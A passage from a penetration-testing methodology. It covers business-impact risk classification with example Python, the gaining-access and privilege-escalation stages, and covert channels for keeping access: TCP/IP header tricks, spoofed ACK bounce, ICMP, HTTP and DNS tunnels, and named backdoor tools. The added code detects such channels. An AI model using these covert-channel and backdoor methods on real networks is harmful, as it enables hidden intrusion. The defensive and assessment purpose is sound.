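            merged[key] = (first, sources + (f.scanner,))  # same issue reported by a second scanner
        else:
            merged[key] = (f, (f.scanner,))
    out: List[Classified] = []
    for (host, port, _), (f, sources) in merged.items():
        risk, deadline, reporting = business_risk(f.technical, host in critical_hosts, f.immediate)
        out.append(Classified(host, port, f.title, f.technical, risk, deadline, reporting, sources))
    out.sort(key=lambda c: (RANK[c.risk], c.host, c.port))
    return out


# Constructed sample scanner output (RFC 5737 addresses, generic finding titles)
FINDINGS = [
    Finding("nessus", "203.0.113.10", 80, "Outdated web server version with public exploit", "high", True),
    Finding("nikto", "203.0.113.10", 80, "Outdated web server version with public exploit", "high", True),
    Finding("nessus", "203.0.113.10", 22, "SSH protocol version 1 enabled", "medium", False),
    Finding("nessus", "203.0.113.11", 25, "Open SMTP relay", "high", True),
    Finding("nessus", "203.0.113.11", 25, "SMTP VRFY/EXPN commands enabled", "low", False),
    Finding("nikto", "203.0.113.11", 80, "Possible interesting file: /test/", "low", False),
]
CRITICAL_HOSTS = {"203.0.113.10"}  # assumption: the web server supports a critical business process
# constructed example of a scanner report verified by hand to be a false positive
KNOWN_FALSE_POSITIVES = {("nikto", "Possible interesting file: /test/")}

if __name__ == "__main__":
    for c in final_list(FINDINGS, CRITICAL_HOSTS, KNOWN_FALSE_POSITIVES):
        print(f"{c.risk:6} {c.host}:{c.port:<5} {c.title} [{', '.join(c.sources)}] -> {c.deadline}; {c.reporting}")
```

The open relay on the non-critical mail host ends up as medium while the weaker SSH finding on the critical web server also ends up as medium, which is exactly the divergence between technical and business-impact classification the text above describes.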
The classification of vulnerability risk based on business impact should follow these
guidelines:

Severity: High risk vulnerabilities
Classification criteria: Vulnerabilities should be classified as high risk if there is an
immediate threat of high and adverse impact on the business-critical processes of the
target organization, i.e. vulnerabilities that allow compromise of systems that support
critical business processes, vulnerabilities that allow mass-propagating malware to
affect these systems, or signs that these systems have been compromised. When the
availability of a certain business process is critical (e.g. systems that verify and control
mechanical operations, where a failure could result in serious injuries to personnel or
have a high cost to the target organization), the vulnerability should be classified as
high risk.
Reporting and solving criteria: Organizations should take immediate measures and try
to fix problems ASAP; fixing procedures should not last more than a week. Assessors
should report this kind of vulnerability immediately, and temporarily suspend tests if it
is convenient and agreed with personnel from the target organization.

Severity: Medium risk vulnerabilities
Classification criteria: Vulnerabilities should be classified as medium risk if there is a
threat of high and adverse impact to systems that are non-critical in business terms.
Also, if there is neither an immediate threat nor a big impact and the vulnerability
affects critical business systems (e.g. a denial of service vulnerability in systems that
can withstand a reasonable amount of time out of operation without affecting the
business), the vulnerability should be classified as medium.
Reporting and solving criteria: Try to fix soon; about two weeks is a reasonable time.
The report should be done after the assessment. However, if there are doubts
regarding the impact on the business, the assessor should give a preview of the
findings to the target personnel so that more information on the impact can be
gathered and the vulnerability risk is properly assessed.

Severity: Low risk vulnerabilities
Classification criteria: A vulnerability should be classified as low risk whenever the
technical and business impact is low, e.g. vulnerabilities that allow non-restricted
information disclosure.
Reporting and solving criteria: Organisations should take a comfortable time and try
to fix within a month. A series of low-risk vulnerabilities may cause similar damage as
medium-risk and even high-risk vulnerabilities, so this should be taken into account;
generally that will need a strong threat matrix. The report should be done after the
assessment.
Business Impact vs Technical Impact matrix
Another useful aid to create the report of vulnerability risk that takes into account
business impact is the following matrix:

                      | Low risk for business     | Medium risk for business  | High risk for business
----------------------+---------------------------+---------------------------+---------------------------
High technical risk   | Resulting risk: MED       | Resulting risk: HIGH      | Resulting risk: HIGH
                      | (e.g. total compromise    | (e.g. total compromise    | (e.g. total compromise
                      | capability on a system    | capability on a system    | capability on a critical
                      | that is unimportant for   | that is important to      | business system)
                      | business)                 | support business          |
                      |                           | processes)                |
----------------------+---------------------------+---------------------------+---------------------------
Medium technical risk | Resulting risk: LOW       | Resulting risk: MED       | Resulting risk: HIGH
                      | (e.g. DoS capability on   | (e.g. DoS capability on   | (e.g. DoS capability on
                      | a system that is          | a system that is          | a critical business
                      | unimportant for business) | important to support      | system)
                      |                           | business processes)       |
----------------------+---------------------------+---------------------------+---------------------------
Low technical risk    | Resulting risk: LOW       | Resulting risk: LOW       | Resulting risk: MED
                      | (e.g. non-critical        | (e.g. non-critical        | (e.g. non-critical
                      | information leak on a     | information leak on a     | information leak on a
                      | system that is            | system that is important  | system that is critical
                      | unimportant for business) | to support business       | for business)
                      |                           | processes)                |

The matrix above should only be taken as a guide; the assessor should be aware
that business impact might outweigh technical impact.
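As an added example (not part of ISSAF), the classification guidelines and the matrix above can be applied mechanically to scanner output, producing the resulting risk, the fixing deadline, the reporting timing and the per-domain summary; the business importance of each host, the findings and the host names are constructed assumptions:

```python
# Added example, not part of ISSAF: turn scanner findings into the business-impact
# classification described above. The business importance of each host is an
# assumption supplied by the target organization's personnel; all data is constructed.
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

# Rows: technical risk from the scanner; columns: business importance of the
# affected system; values: resulting risk, copied from the matrix.
RISK_MATRIX = {
    "HIGH": {"LOW": "MED", "MED": "HIGH", "HIGH": "HIGH"},
    "MED":  {"LOW": "LOW", "MED": "MED",  "HIGH": "HIGH"},
    "LOW":  {"LOW": "LOW", "MED": "LOW",  "HIGH": "MED"},
}

# Reporting and solving criteria: fixing deadline in days and when to report.
FIX_DEADLINE_DAYS = {"HIGH": 7, "MED": 14, "LOW": 30}
REPORT_TIMING = {"HIGH": "immediately", "MED": "after assessment",
                 "LOW": "after assessment"}


@dataclass
class Finding:
    finding_id: str
    host: str
    domain: str          # business domain/component the host belongs to
    technical_risk: str  # scanner's own classification: LOW, MED or HIGH
    title: str


@dataclass
class Classified:
    finding: Finding
    resulting_risk: str
    deadline_days: int
    report: str


def resulting_risk(technical_risk: str, business_importance: str) -> str:
    return RISK_MATRIX[technical_risk][business_importance]


def classify(findings: List[Finding],
             asset_importance: Dict[str, str]) -> List[Classified]:
    """Apply the matrix to every finding. A host missing from the importance
    mapping is treated as HIGH importance until the organization says
    otherwise (conservative default, an assumption of this example)."""
    out = []
    for f in findings:
        risk = resulting_risk(f.technical_risk, asset_importance.get(f.host, "HIGH"))
        out.append(Classified(f, risk, FIX_DEADLINE_DAYS[risk], REPORT_TIMING[risk]))
    return out


def hosts_needing_threat_matrix(classified: List[Classified],
                                min_low_findings: int = 3) -> List[str]:
    """A series of low-risk findings on one host may add up to medium or high
    risk; return hosts whose low-risk findings reach the threshold so they get
    a manual threat-matrix review instead of an automatic LOW."""
    per_host: Dict[str, int] = defaultdict(int)
    for c in classified:
        if c.resulting_risk == "LOW":
            per_host[c.finding.host] += 1
    return sorted(h for h, n in per_host.items() if n >= min_low_findings)


def summary_by_domain(classified: List[Classified]) -> Dict[str, Dict[str, int]]:
    """Vulnerability summary per domain/component, counted by resulting risk."""
    summary: Dict[str, Dict[str, int]] = defaultdict(
        lambda: {"HIGH": 0, "MED": 0, "LOW": 0})
    for c in classified:
        summary[c.finding.domain][c.resulting_risk] += 1
    return dict(summary)


# Constructed sample: scanner findings and the organization's importance map.
SAMPLE_FINDINGS = [
    Finding("F1", "db01", "billing", "HIGH", "remote code execution in DB service"),
    Finding("F2", "kiosk7", "lobby", "HIGH", "remote code execution in kiosk agent"),
    Finding("F3", "web01", "billing", "MED", "denial of service in HTTP parser"),
    Finding("F4", "web01", "billing", "LOW", "server version disclosure"),
    Finding("F5", "web01", "billing", "LOW", "directory listing enabled"),
    Finding("F6", "web01", "billing", "LOW", "verbose error pages"),
    Finding("F7", "fs01", "hr", "LOW", "share name enumeration"),
]
SAMPLE_IMPORTANCE = {"db01": "HIGH", "kiosk7": "LOW", "web01": "MED", "fs01": "HIGH"}

if __name__ == "__main__":
    results = classify(SAMPLE_FINDINGS, SAMPLE_IMPORTANCE)
    for c in results:
        print(f"{c.finding.finding_id} {c.finding.host:7} tech={c.finding.technical_risk:4}"
              f" -> {c.resulting_risk:4} fix within {c.deadline_days}d, report {c.report}")
    print("threat-matrix review:", hosts_needing_threat_matrix(results))
    print("summary:", summary_by_domain(results))
```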
Test Results
This section provides test results based on a common network architecture design.
Assessors should create diagrams to show vulnerability exploitation paths and stages.
This will make it easier for the Target organization personnel to understand the
vulnerabilities, and to identify points of control where they should make changes in order
to minimize risk.
Vulnerability Scanners
Vulnerability scanners are tools designed to perform automated tests to identify and
verify (with some degree of accuracy) the existence of vulnerabilities. Assessors should
make use of these tools to perform most of the vulnerability scanning activities, and
save manual penetration procedures to complement the scanning of complex or well
protected systems, where they will be more rewarding and/or where the capability of
vulnerability scanners is limited.
Some Vulnerability Scanners:
• Nessus (free to use/ commercial)
  o http://www.nessus.org
  o http://www.networkintrusion.co.uk/N_scan.htm
• Sara (free to use)
  o http://www.www-arc.com/sara/
• Internet Scanner (commercial, by ISS)
  o http://www.iss.net/products_services/enterprise_protection/vulnerability_assessment/scanner_internet.php
• Retina Network Security Scanner (commercial, by Eeye)
  o http://www.eeye.com/html/products/retina/index.html
• Netrecon (commercial, by Symantec)
  o http://enterprisesecurity.symantec.com/products/products.cfm?ProductID=46
Search for vulnerabilities affecting the detected OS using the following web sites:
• The vendor/product sites concerned are the most trusted
• BugTraq ID
• CERT
• www.packetstormsecurity.com
B.4 PENETRATION
If the client requires proof of any vulnerabilities or exploits you have identified in the
previous section, you need to demonstrate them in a controlled environment (i.e. you
may need to change routing tables).
The assessor tries to gain access by circumventing the security measures in place and
to expand that access as much as possible. This process can be divided into the
following steps:
• Find proof of concept code/tool
• Test proof of concept code/tool
• Write your own proof of concept code/tool
• Use proof of concept code/tool
B.4.1 Find proof of concept code/tool
Find proof of concept code available in your own repository or from publicly available
sources to test for vulnerabilities. If the code is from your own trusted repository and
thoroughly tested, you can use it, otherwise test it in an isolated environment.
B.4.2 Test proof of concept code/tool
o Customize proof of concept code/tool
o Test proof of concept code/tool in an isolated environment
B.4.3 Write your Own Proof of Concept code/tool
Skip this step if you already have proof of concept code/tool with you. For many
vulnerabilities you come across you will not find publicly available proof of concept
code. For these vulnerabilities the assessment team should write its own proof of
concept code.
B.4.4 Use Proof of Concept code/tool against Target
The proof of concept code/tool is used against the target to gain as many points of
unauthorized access as possible.
B.5 GAINING ACCESS AND PRIVILEGE ESCALATION
In any given situation a system can be enumerated further.
B.5.1 Gaining Access
This stage is reached when the assessor has gained some access on the target by the
steps mentioned in the previous stage and, with this privilege, is in a position to
escalate privileges. This privilege may be least privilege, intermediate privilege, a
compromise or a final compromise. This stage can be further classified as follows:
• Gain Least Privilege
• Gain Intermediate Privilege
• Compromise
• Final Compromise
The above steps need not occur in sequence or in a structured manner. It is also not
the case that following these steps in sequence makes you stealthier. Any one step
can come first.
If the auditor has acquired an intermediate target and is able to use it for pivoting, the
Penetration Testing process will go back to Stage 1, cycling through stages 1 to 5 until
the final target is compromised or the allotted time runs out.
B.5.2 Gaining Access - Gain Least Privilege
Some privileges on the target are gained and these privileges can be used to get further
access to the system. This can be a user account with normal user privileges anywhere
in the network.
B.5.3 Gaining Access - Gain Intermediate Privilege
More privileges than in the previous step are gained and these privileges can be used
to get further access to the system. It can be a privileged user account anywhere in the
network (e.g. domain administrator account, service accounts, backup user accounts
…).
B.5.4 Gaining Access – Compromise
A system anywhere in the target network is fully compromised and further attacks from
this system can be performed. This system can be used as a stepping stone for other
attacks towards the final goal.
B.5.5 Gaining Access - Final Compromise on Target
In this step, the “real” victim, like the company master DB or a specific system/file, is
compromised.
This marks the goal of the penetration testing engagement. Game over!
B.5.6 Privilege Escalation
If an assessor has gained some privileges in the above steps and is in a position to
attack further, follow steps 2.1 to 2.5 again.
B.6 ENUMERATE FURTHER
• Perform password attacks
• Sniff traffic and analyze it
• Gather cookies
• E-mail address gathering
• Identifying routes and networks
• Mapping internal networks
B.7 COMPROMISE REMOTE USERS/SITES
A single hole is sufficient to expose the entire network, no matter how secure your
perimeter network is.
Security between remote users/sites and the enterprise network only secures the
communication between them. What if the remote users/sites themselves are
compromised?
The assessor should try to compromise remote users, telecommuters and/or remote
sites of an enterprise. This will give privileged access to the internal network.
If you are successful in gaining access into remote sites, follow steps 1.1 to 1.7, else
move to the next step.
Countermeasure
• Implement proper security at remote sites.
• Use a desktop firewall on remote users’ desktops and telecommuter laptops, preferably
a centrally managed desktop firewall solution which cannot be disabled by the users.
• Implement host based intrusion detection and prevention mechanisms on remote
users’ desktops and telecommuter laptops.
• Have a separate access control policy for remote users/telecommuters and/or remote
sites.
Examples:
• Cyberarmor
• Checkpoint SecureClient
• Symantec Client Security / Symantec VPN Client
B.8 MAINTAINING ACCESS
B.8.1 Covert Channels
~Whispers on the Wire~
Covert Channels
Introduction
After getting initial access to the compromised network, the assessor needs to retain
communication links with the target network. For this, a covert channel can be the
most effective and stealthy technique, with the least chance of detection.
This section of the methodology covers the intriguing theme of network based covert
channels and describes how these covert data communication and hiding techniques
can be, and are being, actively exploited over various communication networks. It gives
the reader a detailed insight into the background, methods, tools, detection techniques
and future implications associated with them, and the latest insight into this rapidly
evolving field.
History
Covert channels are a genre of information security research which generally does not
form part of mainstream discussions, but it has been an active discussion topic in the
research and government domains for the past 30 years. The notion of covert channels
spawned from a paper by B. W. Lampson titled "A Note on the Confinement Problem",
published in Communications of the ACM in October 1973, which introduced the term but
restricted its use to a subclass of leakage channels that excluded storage channels and
legitimate channels. Lampson defines covert channels as a method of information
transmission over channels not intended for communication, like the process state
buffers. However, the most widely accepted definition of covert channels, by the
Department of Defense Trusted Computer System Evaluation Criteria, defines it as
“... any communication channel that can be exploited by a process to transfer information
in a manner that violates the system's security policy.”
This document categorizes covert channels into two types: Covert Storage Channels
and Covert Timing Channels.
A covert storage channel can be described as the writing of hidden data, by the
communicating entities, into a storage location not specifically meant for communication.
In contrast, communication in a covert timing channel happens when the communicating
entities signal information by manipulating system resources in a way that affects the
observed response time.
Covert channels and steganography (Greek for covered writing) are interwoven and are
often confused. Both deal with data-hiding techniques and the piggybacking of messages
on legitimate communication channels. An example of steganography is manipulating the
low order bits of a bitmap file to conceal information. The science of steganography thus
makes use of covert channels in order to transfer secret information.
Methodology
This section covers a structured process to establish a backdoored covert
communication channel, which includes:
1. Identify a covert channel which can be used
2. Select the best available tool for the covert channel
3. Set up the covert channel in the target network
4. Test the covertness of the channel using common detection techniques
B.8.2 Identify Covert Channel which can be used
The most important consideration at this stage is to choose the correct communication
channel, which will lead to minimal detection, better performance and has multitude of
tools to choose from.
From the initial assessment of the target network we have to analyze which protocols are
allowed to bypass access controls and how much leniency has been provided in the
access control of each protocol. With this information the assessor can decide on the
communication protocol to exploit for covert communication.
B.8.3 Select the best available tool for the covert channel
All well known covert communication techniques have a multitude of tools to choose
from. The assessor must decide on the right tool on the basis of the purpose for which it
will be used and any other performance requirements. For example, for large data
transfers (e.g. files) HTTP based covert channels are the best choice. For performance
based issues we can use ICMP based covert channels. For security issues we can use
SSL tunneling.
B.8.4 Methodology - Setup the covert channel in the target network
After choosing the right communication channels and tools for covert communication,
assessor needs to setup and implement the covert channel for the required purposes.
The rest of this section describes techniques which can be widely used over network
protocols and can be actively exploited for the desired purpose.
Internet Protocol (IP)
Internet Protocol (or IP) is the network layer protocol which drives the Internet. It is a
robust connection-less protocol providing the best way in which higher layer protocols
can send packets to the remote destination in the most economical manner.
The figure shown below describes the structure of the IP header. Many fields in the IP
header are optional, reserved or not used in active connections. These fields can be
used for hiding concealed data bytes, which gives a method of covert data transfer
between the sender and receiver.
The IP ID Method
The 16 bit IP ID (Identification) field is the most eligible choice, which can be used for
byte-to-byte covert communication. The IP ID field gives a unique identification number
to each packet, which is used to identify the fragmented packets during reassembly
among other tasks. Other fields like the Flags can also be used however they have a
possibility of being altered or stripped off by various network transit points due to
fragmentation or filtering.
Transport Control Protocol (TCP)
The Transport Control Protocol (or TCP) is a connection-oriented protocol which handles
end-to-end reliability in network communications. Due to enhanced error-correction and
reliability, it has a lot of control overhead which can be successfully exploited for covert
communication (See below, the TCP header).
Again we will choose only the practical and less varying fields for covert data
piggybacking.
The ISN Method
The 4 byte Sequence Number field seems a good choice. The Initial Sequence
Number (or ISN) is used to establish a reliable end-to-end virtual circuit by means of the
three-way handshake. This standard method involves a Synchronize packet being sent
from the client to the server, which has an ISN describing the connection and the SYN
flag turned on. The server acknowledges with a reply packet having its own ISN and an
Acknowledgement number (client’s ISN+1), with the SYN and ACK flags turned on. The
client further acknowledges this packet, thereby completing the three-way handshake.
The large 32 bit address space of the Sequence Number field can be used for covert
data storage. The sending party will send the payload over the Sequence Number field
and the passively listening receiving party will then extract the data. Hence by using the
Sequence Number field in a Synchronize (SYN) packet we can establish an independent
two way communication channel.
ACK Bounce Method
Another method which involves the TCP header can be used. Termed the ACK
Bounce Method, it provides relatively high anonymity at the cost of no backward
communication.
In this method, the value of the payload (32 bit) is decremented by one and is written to
the Sequence Number field of the TCP header. The sending party then transmits the
payload packet (SYN). The important characteristics which differentiate it from the
previously discussed method are:
• The destination IP address of the payload packet is set to the IP address of the
Bounce (Intermediate) Server.
• The source IP address of the packet is set to the IP address of the receiving party.
Here the Bounce Server can be any server which can act as an intermediary between
sender and receiver. Now when the Bounce Server receives this payload packet from
the sending party, following the prescribed procedure of the three-way handshake, it
replies with an acknowledgement (ACK). However, the acknowledgement packet is sent
to the receiving party (as the source IP address of the payload packet was spoofed to be
that of the receiving party), which is in passive listen mode. The receiving host receives
the packet, decrements the acknowledgement number by one and retrieves the
covert data.
This method fools the Bounce Server into sending the packet and encapsulated data
back to the forged source IP address (receiver). From the receiving end, the packet
appears to originate from the Bounce Server. If the receiving system is behind a firewall
that allows communication to some trusted sites only, this method can be used to
bounce packets off of the trusted sites which will then relay them to the system behind
the firewall with a legitimate source address (receiver).
The two important things to note here are that the Bounce Server TCP port, where the
payload packet was destined, must be in listen mode, and the receiver must be in passive
listen mode for all packets coming from the Bounce Server to a specific port.
These concepts were first introduced by Craig H. Rowland in his excellent article “Covert
Channels in the TCP/IP Protocol Suite”, which also presented a Linux based application
called covert_tcp that demonstrated the concept. An enhanced version of the same
tool called NCovert has been developed by the Nomad Mobile Research Group
(www.nmrc.org).
The ACK Tunneling Method
Most common firewalls available today block all incoming connections from untrusted
hosts, however they allow all outgoing connections. This is what the ACK Tunneling
Method exploits. The sender (outside the firewall) sends concealed data in an ACK
segment, which is destined for a listening receiver (inside the firewall). For the firewall it
may seem as if the payload packet is a reply to some SYN packet, sent during the three
way handshake and hence allows the packet to pass-through. The only thing the
sending party must be aware of is the IP address of the receiver. This method works for
only basic firewalls, because the new-breed of stateful firewalls know all connection
details and will discard the payload packet immediately.
A proof-of-concept implementation was developed by Arne Vidstrom for Windows called
AckCmd. AckCmd is a Trojan based on the ACK Tunneling method which spawns a
command prompt on connection establishment.
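An added example, not from ISSAF or from any of the tools named above, of what the defender's side of the IP ID, ISN, ACK bounce and ACK tunneling methods looks like: a check for header fields that carry one byte per SYN, and the stateful check that rejects ACK and SYN-ACK segments no SYN ever opened. The Packet record, the addresses and the carried text are constructed assumptions; in practice the records would come from a pcap parser.

```python
# Added example, not ISSAF's code: defender-side checks for the IP ID, ISN,
# ACK bounce and ACK tunneling methods described above. Assumes packets are
# already decoded into the Packet records below (by a pcap parser in practice);
# all addresses and the carried text are constructed.
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    flags: str   # TCP flag letters, e.g. "S", "SA", "A"
    ip_id: int   # 16-bit IP Identification field
    seq: int     # 32-bit TCP sequence number (the ISN on a SYN)


def _bytes_of(value: int, width: int) -> List[int]:
    """Big-endian bytes of a header field of the given width in bytes."""
    return [(value >> (8 * i)) & 0xFF for i in reversed(range(width))]


def looks_encoded(values: List[int], width: int, min_samples: int = 6) -> bool:
    """True when a field across a stream looks like one ASCII byte per packet
    padded with a constant: some byte position is printable in every packet
    while every other position never changes. Random IP IDs and ISNs fail
    this with overwhelming probability, so a hit deserves a manual look."""
    if len(values) < min_samples:
        return False
    columns = list(zip(*(_bytes_of(v, width) for v in values)))
    for i, col in enumerate(columns):
        if not all(0x20 <= b <= 0x7E for b in col):
            continue
        if all(len(set(columns[j])) == 1 for j in range(width) if j != i):
            return True
    return False


def detect_header_channels(packets: List[Packet]) -> List[Tuple[str, str, str]]:
    """Group SYN-only segments by (src, dst) and report streams whose IP ID or
    ISN field behaves like a byte-per-packet carrier (IP ID and ISN methods)."""
    syn_streams: Dict[Tuple[str, str], List[Packet]] = defaultdict(list)
    for p in packets:
        if p.flags == "S":
            syn_streams[(p.src, p.dst)].append(p)
    alerts = []
    for (src, dst), pkts in syn_streams.items():
        if looks_encoded([p.ip_id for p in pkts], 2):
            alerts.append((src, dst, "ip_id"))
        if looks_encoded([p.seq for p in pkts], 4):
            alerts.append((src, dst, "isn"))
    return alerts


def detect_unsolicited_segments(packets: List[Packet], protected: Set[str]
                                ) -> List[Tuple[str, str, int, str]]:
    """The stateful check the text says defeats ACK tunneling: an ACK or
    SYN-ACK reaching a protected host on a 4-tuple that no SYN ever opened.
    An unsolicited SYN-ACK is also what the ACK bounce method looks like
    from the receiver's side of the network."""
    known: Set[Tuple[str, int, str, int]] = set()
    alerts = []
    for p in packets:
        if "S" in p.flags and "A" not in p.flags:   # a plain SYN opens a flow
            if p.src in protected:
                known.add((p.src, p.sport, p.dst, p.dport))
            if p.dst in protected:
                known.add((p.dst, p.dport, p.src, p.sport))
        elif p.dst in protected and "A" in p.flags:
            if (p.dst, p.dport, p.src, p.sport) not in known:
                alerts.append((p.src, p.dst, p.dport, p.flags))
    return alerts


def _syn(src: str, dst: str, sport: int, dport: int, ip_id: int, seq: int) -> Packet:
    return Packet(src, dst, sport, dport, "S", ip_id, seq)


# Constructed sample traffic using documentation address ranges.
_RANDOM_ISNS = [0x8F3A21C4, 0x1B9E7D02, 0xE4C05571, 0x0A7FB3D9, 0xC1D26E88, 0x7F10A4E3]
_RANDOM_IDS = [0x4F21, 0x9C03, 0x13E8, 0xA777, 0x0B52, 0xD9AE]
SAMPLE_PACKETS: List[Packet] = [
    # A normal outbound connection from the protected host and its replies.
    _syn("10.0.0.5", "198.51.100.9", 40000, 443, 0x1001, 0x55AA1234),
    Packet("198.51.100.9", "10.0.0.5", 443, 40000, "SA", 0x2002, 0x99887766),
    Packet("198.51.100.9", "10.0.0.5", 443, 40000, "A", 0x2003, 0x99887767),
    # ACK tunneling: a bare ACK to the protected host with no connection behind it.
    Packet("203.0.113.7", "10.0.0.5", 4444, 80, "A", 0x3004, 0x11111111),
    # ACK bounce: a SYN-ACK from a trusted server the protected host never contacted.
    Packet("198.51.100.9", "10.0.0.5", 80, 12345, "SA", 0x3005, 0x22222222),
]
# ISN method as seen on the wire: one character per SYN in the ISN's high byte.
SAMPLE_PACKETS += [_syn("203.0.113.5", "198.51.100.9", 50000 + i, 80,
                        _RANDOM_IDS[i], ord(ch) << 24)
                   for i, ch in enumerate("hello!")]
# Benign SYN retries with properly random ISNs and IP IDs.
SAMPLE_PACKETS += [_syn("192.0.2.10", "198.51.100.9", 51000 + i, 443,
                        _RANDOM_IDS[i], _RANDOM_ISNS[i]) for i in range(6)]
```

Both checks are heuristics: a short or all-repeated-character message stays below the sample threshold, and the stateful check needs to see the opening SYN, so it must run on a sensor that observes both directions.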
Internet Control Message Protocol (ICMP)
Internet Control Message Protocol (or ICMP) was designed to pass error notification and
messages between network hosts and servers. ICMP packets are encapsulated inside
IP datagrams. A network node can send an error notification or query some other node
about some specific information, which the receiving node replies back in a specific
format. ICMP is implemented by all TCP/IP hosts.
The above diagram shows the ICMP header; the Type field identifies the type of packet
and the associated code is given by the Code field. We are interested in the ICMP Echo
Request and Echo Reply. An ICMP Echo Request is used to check whether a remote host
is alive or not. When an echo request is sent to a host, the host replies back with an echo
reply packet. The highly popular Ping command uses echo requests and replies. The
optional data field allows variable length data to be returned to the sender. IP options
like router alert, record route and time stamp can be used to encapsulate the ICMP echo
request message. This provides the possibility of a covert channel. Nowadays most
firewalls filter out incoming echo requests, but they do allow echo replies, which
provides scope for a covert channel bypassing the firewall. Other ICMP packet types
which have a possibility of exploitation are ICMP Address Mask and Router
Solicitation.
Many tools implementing the ICMP protocol as a covert channel have been developed. It
seems to be the most popular choice because of universal support, large data carrying
capacity and it raises fewer suspicions as the protocol itself is considered to be benign.
Article 6 of the highly recognized underground magazine Phrack discusses the
possibility of a covert channel in ICMP (named Project Loki) in a very detailed manner. A
proof-of-concept library called Loki, which implemented ICMP echo request or reply
based covert channels and provided authentication support (simple XOR or Blowfish),
was developed which can be used to implement covertness in any application.
Other popular implementations which are widely used are ICMPTunnel, Ish, ITunnel and
007Shell which emulate a remote shell.
Hyper Text Transfer Protocol (HTTP)
The HTTP protocol is the lifeblood of the World Wide Web. It is perhaps the most widely
deployed protocol over the Internet, and is allowed to pass through almost all networks.
RFC 2616 defines it as
"HTTP protocol is an application-level protocol ... It is a generic, stateless, protocol which
can be used for many tasks beyond its use for hypertext ...."
Almost all organizations allow the use of the HTTP protocol as the WWW is the primary
information resource. However, it has a lot of design flaws which can be exploited, and
hence it is becoming one of the best and most popular ways to conceal covert data flows.
Because of the limitations of lower layer protocols (TCP, IP, ICMP), like limited data
carrying capacity, bandwidth limitations, and possible alteration of the protocol header
fields (IP ID, TCP ISN etc.) at intermediate network nodes, HTTP has become the de-facto
way to go covert.
The most commendable research on HTTP as a viable covert channel has been done by
researchers at www.Gray-World.net. The website is undoubtedly one of the best places to
gather cutting edge information about covert channels (or what they term network
access control systems bypassing).
HTTP is request-response based: the client sends a request and the server
acknowledges by sending the requested data. The architecture of covert channels over
HTTP is also client-server based. The covert server can listen for requests coming in at
port 80, like normal HTTP servers. The covert client connects to the server and the covert
communication is processed in a similar fashion to HTTP request-response. Alternatively,
a proxy-like covert server can be implemented which redirects the request to another
server, gets the response and sends it back. Another method is a CGI-based backdoor in
which arbitrary data can be passed via the URL strings of requests. Many add-on
techniques like using multiple proxies, reverse connections, authentication, encryption,
multiple HTTP headers for communication, reverse proxies and proprietary user defined
modes can further complicate matters and can make the channel almost impossible to
detect.
There is an attractive stockpile of tools for HTTP based covert channeling. Covert
Channel and Testing Tool (CCTT, by www.gray-world.net) tunnels any generic
communication, like SSH, into a higher layer protocol like HTTP. It has a lot of
configuration options, like elaborate support for proxies, multiple clients and reverse
proxies, which make it a very effective tool. Another tool called HTTPTunnel (by Lars
Brinkhoff) provides bi-directional virtual data paths tunneled in HTTP. HTun is another,
one of its kind tool, which provides a complete point-to-point virtual IP network over valid
HTTP requests.
Tools like ProxyTunnel, Transconnect, Corkscrew and FirePass provide tunneling of
various communication channels (like SSH, Telnet) by implementing various HTTP
based covert channeling techniques. The list of tools which provide covert channels and
tunneling of data streams over HTTP is almost endless, the user has a lot of options to
choose a practically viable application.
IPv6
IPv6 is the new avatar of IP. It is a proposed enhancement over IP, meant to replace it
completely in the coming years. It provides enhanced reliability, a broader address space
and more security than IP. As you might have guessed, IPv6 can also be used as a vector
of covert communication. The Extension Header in the IPv6 protocol has 16 bits for the
Next Header type, 8 bits for the header length and a variable length options field (which
must be TLV encoded).
The first two high order bits of the options field specify what action must be taken if the
option type is not recognized:
00 - Skip this option and continue processing the header.
01 - Discard the packet.
A possible covert channel can be implemented if we generate a destination options
extension header. Set the high order 2 bits of the option type to 00 and choose an option
type value not recognized yet. Then encode the packet in the TLV format.
A proof-of-concept chat application called J6P (Joe 6 Pack) was developed by Thomas
Graf using this technique. The technique is widely used to transfer IRC traffic stealthily.
Domain Name Service (DNS) Protocol
Unluckily the Domain Name Service (or DNS) Protocol, which is the backbone of the
Internet naming system, has also been hit by the covert contortionists. The DNS recursion
technique is where the stealth data can be planted. NSTx and DNShell use these methods
to provide an effective covert channel over DNS. The data is sent through a series of
client-server communications by encoding data in DNS TXT, DNS A and DNS NXT packets.
Covert Miscellany
Now we will describe some out of the league concealed communication techniques and
some attention-grabbing experimentation and research in the same.
Applications:
Active Port Forwarder is an interesting application which bypasses firewalls by using an
intermediate port forwarding node, with added compression and SSL support.
BackStealth is another application which is executed in the memory space of the firewall
itself.
MSNShell is a covert communication application which provides data hiding in the MSN
Messenger Protocol.
TunnelShell provides stealthy command shell by using malformed packets like
fragmented IP packets without headers for the fourth layer, which many firewalls allow to
pass through.
Cd00r.c and SADoor provide passive listening backdoors which do not bind to any
specific port. These are activated by sending a specialized sequence of packets.
RECUB is another user-friendly covert mode application which provides a graphical
interface, encryption and ICMP based authentication.
Techniques:
M. Marone (Yale University) provides a fascinating analysis of the possibility of using
ad-hoc mobile network protocols like Dynamic Source Routing as a medium of clandestine
communication in his paper titled “Adaptation and Performance of Covert Channels in
Dynamic Source Routing”.
Christopher Abad (UCLA) stresses the fact that an elementary flaw in the Internet
checksum technique can allow data camouflage in the checksum itself, using hash
collisions.
Spamdoor is the term describing the feasibility of using spam as a vector of backdoor
communication.
Kamran Ehsan (University of Toronto) has written an absolutely must-read post-graduate
thesis titled “Covert Channel Analysis and Data Hiding in TCP/IP” which discusses many
potent channeling techniques over TCP/IP, ICMP, IGMP and IPSec.
B.8.5 Test the covertness of channel using common detection
technique
Before moving on further I would like to add that detection of network based covert
channels is still in its infancy. All the research done so far mostly discusses the
theoretical possibilities, dealing with statistical analyses, probabilistic theories and
complex mathematics, with few rare implementations and practicals. However, this does
not mean that detection is not practically feasible. It’s just that the berry will take some
time to ripen.
After ripping apart covert channels, the research community seems a little bored, and
now detection of these channels has become the hot topic among these communication
cohorts. The extent of documentation emerging on the issue is spectacular. All high-profile
conferences (like the Information Hiding Workshops, Communications of the ACM) feature
quite a few papers on them. We will have a walk over a few interesting, practically viable
techniques.
B.8.5.1 STREAM PROFILING
Stream Profiling is a grassroots technique which profiles or records the data flow of
various protocols, slowly and steadily developing a signature for regular traffic. It then
analyses data flow comparing the standard signatures with the current, informing the
